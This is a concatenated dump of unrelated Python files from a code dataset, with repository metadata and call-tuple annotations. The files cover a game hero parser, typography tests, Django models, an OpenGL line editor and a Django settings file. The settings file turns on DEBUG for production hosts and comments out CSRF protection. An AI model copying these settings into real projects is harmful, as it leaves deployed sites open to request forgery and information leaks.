hero_info['subClass'] = contract_entry[tuple_index][9]
hero['info'] = hero_info
tuple_index = tuple_index + 1
# HeroState
hero_state = {}
hero_state['staminaFullAt'] = contract_entry[tuple_index][0]
hero_state['hpFullAt'] = contract_entry[tuple_index][1]
hero_state['mpFullAt'] = contract_entry[tuple_index][2]
hero_state['level'] = contract_entry[tuple_index][3]
hero_state['xp'] = contract_entry[tuple_index][4]
hero_state['currentQuest'] = contract_entry[tuple_index][5]
hero_state['sp'] = contract_entry[tuple_index][6]
hero_state['status'] = contract_entry[tuple_index][7]
hero['state'] = hero_state
tuple_index = tuple_index + 1
# HeroStats
hero_stats = {}
hero_stats['strength'] = contract_entry[tuple_index][0]
hero_stats['intelligence'] = contract_entry[tuple_index][1]
hero_stats['wisdom'] = contract_entry[tuple_index][2]
hero_stats['luck'] = contract_entry[tuple_index][3]
hero_stats['agility'] = contract_entry[tuple_index][4]
hero_stats['vitality'] = contract_entry[tuple_index][5]
hero_stats['endurance'] = contract_entry[tuple_index][6]
hero_stats['dexterity'] = contract_entry[tuple_index][7]
hero_stats['hp'] = contract_entry[tuple_index][8]
hero_stats['mp'] = contract_entry[tuple_index][9]
hero_stats['stamina'] = contract_entry[tuple_index][10]
hero['stats'] = hero_stats
tuple_index = tuple_index + 1
# primary HeroStatGrowth
hero_primary_stat_growth = {}
hero_primary_stat_growth['strength'] = contract_entry[tuple_index][0]
hero_primary_stat_growth['intelligence'] = contract_entry[tuple_index][1]
hero_primary_stat_growth['wisdom'] = contract_entry[tuple_index][2]
hero_primary_stat_growth['luck'] = contract_entry[tuple_index][3]
hero_primary_stat_growth['agility'] = contract_entry[tuple_index][4]
hero_primary_stat_growth['vitality'] = contract_entry[tuple_index][5]
hero_primary_stat_growth['endurance'] = contract_entry[tuple_index][6]
hero_primary_stat_growth['dexterity'] = contract_entry[tuple_index][7]
hero_primary_stat_growth['hpSm'] = contract_entry[tuple_index][8]
hero_primary_stat_growth['hpRg'] = contract_entry[tuple_index][9]
hero_primary_stat_growth['hpLg'] = contract_entry[tuple_index][10]
hero_primary_stat_growth['mpSm'] = contract_entry[tuple_index][11]
hero_primary_stat_growth['mpRg'] = contract_entry[tuple_index][12]
hero_primary_stat_growth['mpLg'] = contract_entry[tuple_index][13]
hero['primaryStatGrowth'] = hero_primary_stat_growth
tuple_index = tuple_index + 1
# secondary HeroStatGrowth
hero_secondary_stat_growth = {}
hero_secondary_stat_growth['strength'] = contract_entry[tuple_index][0]
hero_secondary_stat_growth['intelligence'] = contract_entry[tuple_index][1]
hero_secondary_stat_growth['wisdom'] = contract_entry[tuple_index][2]
hero_secondary_stat_growth['luck'] = contract_entry[tuple_index][3]
hero_secondary_stat_growth['agility'] = contract_entry[tuple_index][4]
hero_secondary_stat_growth['vitality'] = contract_entry[tuple_index][5]
hero_secondary_stat_growth['endurance'] = contract_entry[tuple_index][6]
hero_secondary_stat_growth['dexterity'] = contract_entry[tuple_index][7]
hero_secondary_stat_growth['hpSm'] = contract_entry[tuple_index][8]
hero_secondary_stat_growth['hpRg'] = contract_entry[tuple_index][9]
hero_secondary_stat_growth['hpLg'] = contract_entry[tuple_index][10]
hero_secondary_stat_growth['mpSm'] = contract_entry[tuple_index][11]
hero_secondary_stat_growth['mpRg'] = contract_entry[tuple_index][12]
hero_secondary_stat_growth['mpLg'] = contract_entry[tuple_index][13]
hero['secondaryStatGrowth'] = hero_secondary_stat_growth
tuple_index = tuple_index + 1
# HeroProfessions
hero_professions = {}
hero_professions['mining'] = contract_entry[tuple_index][0]
hero_professions['gardening'] = contract_entry[tuple_index][1]
hero_professions['foraging'] = contract_entry[tuple_index][2]
hero_professions['fishing'] = contract_entry[tuple_index][3]
hero['professions'] = hero_professions
return hero
def human_readable_hero(raw_hero, hero_male_first_names=None, hero_female_first_names=None, hero_last_names=None):
readable_hero = copy.deepcopy(raw_hero)
readable_hero['info']['rarity'] = hero_utils.parse_rarity(readable_hero['info']['rarity'])
readable_hero['info']['class'] = hero_utils.parse_class(readable_hero['info']['class'])
readable_hero['info']['subClass'] = hero_utils.parse_class(readable_hero['info']['subClass'])
# visualGenes
readable_hero['info']['visualGenes'] = hero_utils.parse_visual_genes(readable_hero['info']['visualGenes'])
# statsGenes
readable_hero['info']['statGenes'] = hero_utils.parse_stat_genes(readable_hero['info']['statGenes'])
# names
if readable_hero['info']['visualGenes']['gender'] == 'male':
if hero_male_first_names is not None:
readable_hero['info']['firstName'] = hero_male_first_names[readable_hero['info']['firstName']]
else:
if hero_female_first_names is not None:
readable_hero['info']['firstName'] = hero_female_first_names[readable_hero['info']['firstName']]
if hero_last_names is not None:
readable_hero['info']['lastName'] = hero_last_names[readable_hero['info']['lastName']]
return readable_hero
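

# A hedged usage sketch (not part of the original module). The RPC URL is a
# placeholder, and without name lists the first/last names stay numeric, as
# handled above:
#
#   raw = get_hero(1, "https://api.harmony.one")
#   hero = human_readable_hero(raw)
#   print(hero['info']['class'], hero['stats']['strength'])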
| [((71, 23, 71, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(71, 46, 71, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((97, 23, 97, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(97, 46, 97, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((106, 23, 106, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(106, 46, 106, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((115, 23, 115, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(115, 46, 115, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((124, 23, 124, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(124, 46, 124, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((246, 20, 246, 43), 'copy.deepcopy', 'copy.deepcopy', ({(246, 34, 246, 42): 'raw_hero'}, {}), '(raw_hero)', False, 'import copy\n'), ((67, 14, 67, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(67, 32, 67, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((95, 14, 95, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(95, 32, 95, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((104, 14, 104, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(104, 32, 104, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((113, 14, 113, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(113, 32, 113, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((122, 14, 122, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(122, 32, 122, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((109, 44, 109, 80), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(109, 67, 109, 79): 'user_address'}, {}), '(user_address)', False, 'from web3 import Web3\n'), ((118, 47, 118, 76), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 70, 118, 75): 'owner'}, {}), '(owner)', False, 'from web3 import Web3\n'), ((118, 78, 118, 110), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 101, 118, 109): 'operator'}, {}), '(operator)', False, 'from web3 import Web3\n')] |
honzajavorek/tipi | tests/test_langs_fr.py | cbe51192725608b6fba1244a48610ae231b13e08 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from tipi import tipi as _tipi
tipi = lambda s: _tipi(s, lang='fr')
def test_double_quotes():
assert tipi('''"brutal" "quote's"''') == (
'''«brutal» «quote's»'''
)
def test_single_quotes():
assert tipi("""'brutal' 'quote's'""") == (
"""‹brutal› ‹quote's›"""
)
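

# A hedged aside (not part of the original tests): the same wrapper pattern
# selects any other language tipi ships rules for, e.g. Czech:
#
#   tipi_cs = lambda s: _tipi(s, lang='cs')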
| [((8, 17, 8, 36), 'tipi.tipi', '_tipi', (), '', True, 'from tipi import tipi as _tipi\n')] |
brethauer/mirage | vendor/models.py | 396f61206bf76f997c0535277af918058aa1b827 | from django.db import models
VEHICLE_CHOICES = (
('OASISSB', 'OASIS Small Business'),
('OASIS', 'OASIS Unrestricted')
)
STATUS_CHOICES = (
('P', 'In Progress'),
('C', 'Completed'),
('F', 'Cancelled')
)
class Vendor(models.Model):
name = models.CharField(max_length=128)
duns = models.CharField(max_length=9, unique=True)
duns_4 = models.CharField(max_length=13, unique=True)
cage = models.CharField(max_length=15, null=True)
sam_address = models.CharField(null=True, max_length=128)
sam_citystate = models.CharField(null=True, max_length=128)
cm_name = models.CharField(null=True, max_length=128)
cm_email = models.CharField(null=True, max_length=128)
cm_phone = models.CharField(null=True, max_length=128)
pm_name = models.CharField(null=True, max_length=128)
pm_email = models.CharField(null=True, max_length=128)
pm_phone = models.CharField(null=True, max_length=128)
pools = models.ManyToManyField('Pool', through='PoolPIID')
    setasides = models.ManyToManyField('SetAside', blank=True)  # null has no effect on ManyToManyField
sam_status = models.CharField(null=True, max_length=128)
sam_activation_date = models.DateTimeField(null=True)
sam_expiration_date = models.DateTimeField(null=True)
sam_exclusion = models.NullBooleanField(null=True)
sam_url = models.URLField(null=True)
annual_revenue = models.BigIntegerField(null=True)
number_of_employees = models.IntegerField(null=True)
def __str__(self):
return self.name
class Pool(models.Model):
id = models.CharField(primary_key=True, max_length=128)
name = models.CharField(max_length=128, default='Pool')
number = models.CharField(max_length=128)
vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=7)
naics = models.ManyToManyField('Naics')
threshold = models.CharField(null=True, max_length=128)
def __str__(self):
return "Pool {0} - {1}".format(self.number, self.get_vehicle_display())
class PoolPIID(models.Model):
vendor = models.ForeignKey('Vendor')
pool = models.ForeignKey('Pool')
piid = models.CharField(max_length=128)
def __str__(self):
return "{0} - {1} - {2}".format(self.vendor.name, self.pool.id, self.piid)
class SetAside(models.Model):
code = models.CharField(unique=True, max_length=128)
short_name = models.CharField(max_length=128)
abbreviation = models.CharField(max_length=10, null=True)
far_order = models.IntegerField(null=True)
def __str__(self):
return self.short_name
class Naics(models.Model):
code = models.CharField(max_length=128)
description = models.TextField()
short_code = models.CharField(unique=True, max_length=25)
def __str__(self):
return "{0} - {1}".format(self.code, self.description)
class SamLoad(models.Model):
sam_load = models.DateField()
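

# A hedged usage sketch (not part of the original module); model and field
# names are taken from the definitions above:
#
#   small_biz = Vendor.objects.filter(pools__vehicle='OASISSB').distinct()
#   awards = PoolPIID.objects.select_related('vendor', 'pool').filter(pool__number='1')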
 | [((17, 11, 17, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((18, 11, 18, 54), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((19, 13, 19, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((20, 11, 20, 53), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((21, 18, 21, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((22, 20, 22, 63), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((23, 14, 23, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 15, 24, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((25, 15, 25, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((26, 14, 26, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((27, 15, 27, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((28, 15, 28, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((29, 12, 29, 62), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((30, 16, 30, 73), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((31, 17, 31, 60), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((32, 26, 32, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((33, 26, 33, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((34, 20, 34, 54), 'django.db.models.NullBooleanField', 'models.NullBooleanField', (), '', False, 'from django.db import models\n'), ((35, 14, 35, 40), 'django.db.models.URLField', 'models.URLField', (), '', False, 'from django.db import models\n'), ((36, 21, 36, 54), 'django.db.models.BigIntegerField', 'models.BigIntegerField', (), '', False, 'from django.db import models\n'), ((37, 26, 37, 56), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((45, 9, 45, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((46, 11, 46, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((47, 13, 47, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((48, 14, 48, 69), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((49, 12, 49, 43), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ({(49, 35, 49, 42): '"""Naics"""'}, {}), "('Naics')", False, 'from django.db import models\n'), ((50, 16, 50, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((57, 13, 57, 40), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(57, 31, 57, 39): '"""Vendor"""'}, {}), "('Vendor')", False, 'from django.db import models\n'), ((58, 11, 58, 36), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(58, 29, 58, 35): '"""Pool"""'}, {}), "('Pool')", False, 'from django.db import models\n'), ((59, 11, 59, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((66, 11, 66, 56), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((67, 17, 67, 49), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((68, 19, 68, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((69, 16, 69, 46), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((76, 11, 76, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((77, 18, 77, 36), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((78, 17, 78, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((84, 15, 84, 33), 'django.db.models.DateField', 'models.DateField', ({}, {}), '()', False, 'from django.db import models\n')]
L-McCormack/two-qubit-simulator | two_qubit_simulator/circuits.py | d7115f0630c9931724aa660dba4b89a50db4e2e0 | """
Contains the QuantumCircuit class.
"""
class QuantumCircuit(object): # pylint: disable=useless-object-inheritance
""" Implements a quantum circuit.
- - - WRITE DOCUMENTATION HERE - - -
"""
    def __init__(self):
        """ Initialise a QuantumCircuit object """
        # Minimal sketch (hedged): gates are stored in application order.
        self.gates = []

    def add_gate(self, gate):
        """ Add a gate to the circuit """
        self.gates.append(gate)

    def run_circuit(self, register):
        """ Run the circuit on a given quantum register """
        # Hedged assumption: each gate is callable on a register; the gate
        # interface is not defined in this module.
        for gate in self.gates:
            gate(register)
        return register

    def __call__(self, register):
        """ Run the circuit on a given quantum register """
        return self.run_circuit(register)
| [] |
usgs/water-datapreptools | examples/bathymetricGradient.py | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | import sys
sys.path.append("..") # change environment to see tools
from make_hydrodem import bathymetricGradient
workspace = r"" # path to geodatabase to use as a workspace
snapGrid = r"" # path to snapping grid
hucPoly = r"" # path to local folder polygon
hydrographyArea = r"" # path to NHD area feature class
hydrographyFlowline = r"" # path to NHD flowline feature class
hydrographyWaterbody = r"" # path to NHD water body feature class
cellsize = '' # cell size
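
# Hypothetical example values (placeholders only, not from the original script):
#   workspace = r"C:\data\hydro_project.gdb"
#   snapGrid = r"C:\data\snap_grid"
#   hucPoly = r"C:\data\hydro_project.gdb\local_folders"
#   hydrographyArea = r"C:\data\hydro_project.gdb\NHDArea"
#   hydrographyFlowline = r"C:\data\hydro_project.gdb\NHDFlowline"
#   hydrographyWaterbody = r"C:\data\hydro_project.gdb\NHDWaterbody"
#   cellsize = '10'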
bathymetricGradient(workspace, snapGrid, hucPoly, hydrographyArea,
hydrographyFlowline, hydrographyWaterbody,cellsize) | [((2, 0, 2, 21), 'sys.path.append', 'sys.path.append', ({(2, 16, 2, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((13, 0, 14, 52), 'make_hydrodem.bathymetricGradient', 'bathymetricGradient', ({(13, 20, 13, 29): 'workspace', (13, 31, 13, 39): 'snapGrid', (13, 41, 13, 48): 'hucPoly', (13, 50, 13, 65): 'hydrographyArea', (14, 1, 14, 20): 'hydrographyFlowline', (14, 22, 14, 42): 'hydrographyWaterbody', (14, 43, 14, 51): 'cellsize'}, {}), '(workspace, snapGrid, hucPoly, hydrographyArea,\n hydrographyFlowline, hydrographyWaterbody, cellsize)', False, 'from make_hydrodem import bathymetricGradient\n')] |
hxb1997/Menge | out/flowContext.py | 7a09a6236d8eef23e3d15d08873d5918d064761b | # This is the OpenGL context for drawing flow calculation lines
from Context import *
from primitives import Vector2, Segment
from OpenGL.GL import *
from copy import deepcopy
class GLFlowSegment( Segment ):
'''The OpenGL representation of a flow line. Basically a segment
with a direciton indicator. The direction indicator shows which
way flow is expected to cross the line. The flow direction is to
the RIGHT of the segment. The forward direction is the direction
from p1 to p2.'''
def __init__( self, p1, p2 ):
'''Constructor.
@param p1 An instance of Vector2. The start point of the segment.
@param p2 An instance of Vector2. The end point of the segment.
'''
Segment.__init__( self, p1, p2 )
def __str__( self ):
return "GLFlowSegment (%s, %s)" % ( self.p1, self.p2 )
def __repr__( self ):
return str( self )
def drawGL( self, color=(0.1, 1.0, 0.1) ):
'''Draw the flow segment into a GL context.
@param A 3-tuple of floats. The color of the line.
All values should lie in the range [0, 1], to be
interpreted as r, g, b color values.
'''
glPushAttrib( GL_COLOR_BUFFER_BIT )
glBegin( GL_LINES )
glColor3fv( color )
glVertex2f( self.p1.x, self.p1.y )
glVertex2f( self.p2.x, self.p2.y )
mp = self.midPoint()
l = self.magnitude()
n = self.normal() * (0.25 * l )
end = mp + n
glVertex2f( mp.x, mp.y )
glVertex2f( end.x, end.y )
glEnd()
glPopAttrib()
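
# A hedged usage sketch (not part of the original module); Vector2 comes from
# primitives, imported above. Per the class docstring, flow is expected to
# cross to the RIGHT of the p1->p2 direction:
#
#   seg = GLFlowSegment( Vector2( 0, 0 ), Vector2( 1, 0 ) )
#   seg.drawGL( ( 1.0, 0.5, 0.1 ) )   # segment plus its direction indicator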
class FlowLineContext( BaseContext ):
'''Context for drawing, creating and editing lines'''
MIN_LINE_LENGTH = 2 # the minimum drag required to draw a line
# edit state - used for knowing what to do with the active line and cancellation
NO_EDIT = 0
EDIT = 1
ADD = 2
def __init__( self, cancelCB=None, editCB=None ):
'''Constructor.
@param cancelCB A callable. An optional callback object
for when flow line drawing is canceled.
@param editCB A callable. An optional callback object
for when a flow line values are edited.
'''
BaseContext.__init__( self )
self.lines = []
self.names = []
self.activeID = -1 # the line currently affected by modifications
self.editState = self.NO_EDIT
self.cancelCB = cancelCB
self.editCB = editCB
self.activeLine = None
self.canDraw = False
self.dragging = False
        self.downPos = None
def copy( self, context ):
'''Copy the state of the given FlowLineContext into this'''
assert( isinstance( context, FlowLineContext ) )
self.clear()
self.names = [ a for a in context.names ]
self.lines = deepcopy( context.lines )
def clear( self ):
'''Clears out all of the lines'''
self.lines = []
self.names = []
self.activeID = -1
self.editState = self.NO_EDIT
self.activeLine = None
self.canDraw = False
self.dragging = False
        self.downPos = None
def lineCount( self ):
return len( self.lines )
def getName( self, id ):
'''Returns the name associated with the line index, id.
@param id An integer. The index into the stored set of lines.
@return A string. The stored name.
'''
return self.names[ id ]
def getLine( self, id ):
'''Returns the name associated with the line index, id.
@param id An integer. The index into the stored set of lines.
@return An instance of a FlowLine.
'''
return self.lines[ id ]
def addLine( self ):
'''Causes the context to go into new line mode. Returning the new name.'''
self.canDraw = True
self.editState = self.ADD
self.activeID = -1
self.names.append( 'Line %d' % len( self.names ) )
self.lines.append( GLFlowSegment( Vector2(0, 0), Vector2(0, 0) ) )
self.activeLine = self.lines[-1]
return self.names[-1]
def editLine( self, idx ):
'''Edits the indicated line'''
if ( self.editState == self.ADD): return
if ( idx < 0 ):
self.editState = self.NO_EDIT
self.canDraw = False
self.activeID = -1
else:
self.editState = self.EDIT
self.canDraw = True
self.activeID = idx
def setLineName( self, idx, name ):
'''Sets the name for the line with the given index'''
self.names[ idx ] = name
def deleteLine( self, idx ):
'''Removes a line from the set'''
assert( idx >= 0 and idx < len( self.lines ) )
self.lines.pop( idx )
self.names.pop( idx )
self.activeID = -1
def flipLine( self, idx ):
'''Flips the direction of the line in the set'''
assert( idx >= 0 and idx < len( self.lines ) )
self.lines[ idx ].flip()
def setActive( self, idx ):
'''Sets the active line'''
self.activeID = idx
def stopEdit( self ):
'''Stops the ability to edit'''
self.editState = self.NO_EDIT
self.canDraw = False
def getLineCount( self ):
"""Returns the number of defined lines"""
return len( self.lines )
def setMultiLines( self, names, lines ):
'''Sets the lines in the context with the given names and lines.
It is asserted that len( names ) == len( lines ).
@param names A list of strings. One name per line.
        @param lines A list of Segment instances. One line per name.
'''
        self.lines = [ GLFlowSegment( x.p1, x.p2 ) for x in lines ]
self.names = names
self.activeID = -1
self.editState = self.NO_EDIT
def handleMouse ( self, evt, view ):
"""Detects click, drag, release and creates a line"""
result = ContextResult()
try:
event = self.canonicalEvent( evt )
        except ValueError:
return result
if ( not self.canDraw ):
return result
if ( event.noModifiers() ):
btn = event.button
eX = event.x
eY = event.y
if ( event.type == MouseEvent.DOWN ): #QtCore.QEvent.MouseButtonPress ):
if ( btn == MouseEvent.LEFT ):
self.downPos = Vector2( eX, eY )
x, y = view.screenToWorld( ( eX, eY ) )
p1 = Vector2( x, y )
self.activeLine = GLFlowSegment( p1, p1 )
result.set( True, True, False )
self.dragging = True
self.notifyEdit( self.activeLine )
elif ( btn == MouseEvent.RIGHT and self.dragging ):
# cancel the edit
if ( self.editState == self.ADD ):
self.editState = self.NO_EDIT
self.lines.pop(-1)
self.names.pop(-1)
                    if ( self.cancelCB is not None ):
self.cancelCB()
self.notifyEdit( None )
                    canceled = self.activeLine is not None
self.activeLine = None
self.dragging = False
result.set( canceled, canceled, False )
elif ( event.type == MouseEvent.UP ):
if ( btn == MouseEvent.LEFT and self.dragging ):
endPos = Vector2( eX, eY )
if ( (endPos - self.downPos).magnitude() >= self.MIN_LINE_LENGTH ):
if ( self.editState == self.ADD ):
self.activeID = len( self.lines ) - 1
self.lines[self.activeID] = self.activeLine
self.editState = self.EDIT
self.notifyEdit( self.activeLine )
elif ( self.editState == self.EDIT ):
assert( self.activeID > -1 )
self.lines[ self.activeID ] = self.activeLine
self.notifyEdit( self.activeLine )
                    self.activeLine = None
self.dragging = False
result.set( True, True, False )
elif ( event.type == MouseEvent.MOVE ):
if ( self.dragging ):
x, y = view.screenToWorld( ( eX, eY ) )
p2 = Vector2( x, y )
self.activeLine.p2 = p2
result.set( True, True, False )
self.notifyEdit( self.activeLine )
return result
def notifyEdit( self, line ):
'''Notifies call back of a line that has changed'''
if ( not self.editCB is None ):
self.editCB( line )
def drawGL( self ):
'''Basic lines are drawn in default (green), the active line is drawn in yellow,
and when it is being edited, the original disappears and the new line is drawn in
cyan.'''
if ( self.activeLine ):
self.activeLine.drawGL( ( 0.1, 1.0, 1.0 ) )
elif ( self.activeID > -1 and self.editState != self.ADD ):
self.lines[ self.activeID ].drawGL( ( 1.0, 1.0, 0.1 ) )
for i, line in enumerate( self.lines ):
if ( i == self.activeID ): continue
line.drawGL()
| [((20, 8, 20, 40), 'primitives.Segment.__init__', 'Segment.__init__', ({(20, 26, 20, 30): 'self', (20, 32, 20, 34): 'p1', (20, 36, 20, 38): 'p2'}, {}), '(self, p1, p2)', False, 'from primitives import Vector2, Segment\n'), ((84, 21, 84, 46), 'copy.deepcopy', 'deepcopy', ({(84, 31, 84, 44): 'context.lines'}, {}), '(context.lines)', False, 'from copy import deepcopy\n'), ((122, 42, 122, 55), 'primitives.Vector2', 'Vector2', ({(122, 50, 122, 51): '(0)', (122, 53, 122, 54): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((122, 57, 122, 70), 'primitives.Vector2', 'Vector2', ({(122, 65, 122, 66): '(0)', (122, 68, 122, 69): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((195, 35, 195, 52), 'primitives.Vector2', 'Vector2', ({(195, 44, 195, 46): 'eX', (195, 48, 195, 50): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((197, 25, 197, 40), 'primitives.Vector2', 'Vector2', ({(197, 34, 197, 35): 'x', (197, 37, 197, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n'), ((217, 29, 217, 46), 'primitives.Vector2', 'Vector2', ({(217, 38, 217, 40): 'eX', (217, 42, 217, 44): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((235, 25, 235, 40), 'primitives.Vector2', 'Vector2', ({(235, 34, 235, 35): 'x', (235, 37, 235, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n')] |
Paola351/instascrape | instascrape/collectors/__init__.py | b4a50c9140fa9054187738f6d1564cecc32cbaab | from .interval_collectors import *
| [] |
ghoslation/algorithm | Codes/gracekoo/test.py | 5708bf89e59a80cd0f50f2e6138f069b4f9bc96e | # -*- coding: utf-8 -*-
# @Time: 2020/11/8 23:47
# @Author: GraceKoo
# @File: test.py
# @Desc:
from threading import Thread
import time
def print_numbers():
time.sleep(0.2)
print("子线程结束")
if __name__ == "__main__":
t1 = Thread(target=print_numbers)
t1.setDaemon(True)
t1.start()
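    # Note: t1 is a daemon thread, so if the main thread exits before the
    # 0.2 s sleep finishes, the child's print call may never execute.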
# print("主线程结束")
| [((11, 4, 11, 19), 'time.sleep', 'time.sleep', ({(11, 15, 11, 18): '(0.2)'}, {}), '(0.2)', False, 'import time\n'), ((16, 9, 16, 37), 'threading.Thread', 'Thread', (), '', False, 'from threading import Thread\n')] |
gregory-chekler/api | src/_main_/settings.py | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | """
Django settings for massenergize_portal_backend project.
Generated by 'django-admin startproject' using Django 2.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import firebase_admin
from firebase_admin import credentials
from .utils.utils import load_json
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ******** LOAD CONFIG DATA ***********#
IS_PROD = False
path_to_config = '/_main_/config/massenergizeProdConfig.json' if IS_PROD else '/_main_/config/massenergizeProjectConfig.json'
CONFIG_DATA = load_json(BASE_DIR + path_to_config)
os.environ.update(CONFIG_DATA)
# ******** END LOAD CONFIG DATA ***********#
SECRET_KEY = CONFIG_DATA["SECRET_KEY"]
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'api.massenergize.org',
'apis.massenergize.org',
'api.massenergize.com',
'apis.massenergize.com',
'api-prod.massenergize.org',
'api.prod.massenergize.org',
'api-dev.massenergize.org',
'api.dev.massenergize.org',
'massenergize-api.wpdvzstek2.us-east-2.elasticbeanstalk.com'
]
INSTALLED_APPS = [
'authentication',
'carbon_calculator',
'database',
'api',
'website',
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
#custom middlewares
'authentication.middleware.MassenergizeJWTAuthMiddleware'
]
#-------- FILE STORAGE CONFIGURATION ---------------------#
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
#-------- FILE STORAGE CONFIGURATION ---------------------#
#-------- AWS CONFIGURATION ---------------------#
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')
AWS_S3_SIGNATURE_VERSION = os.environ.get('AWS_S3_SIGNATURE_VERSION')
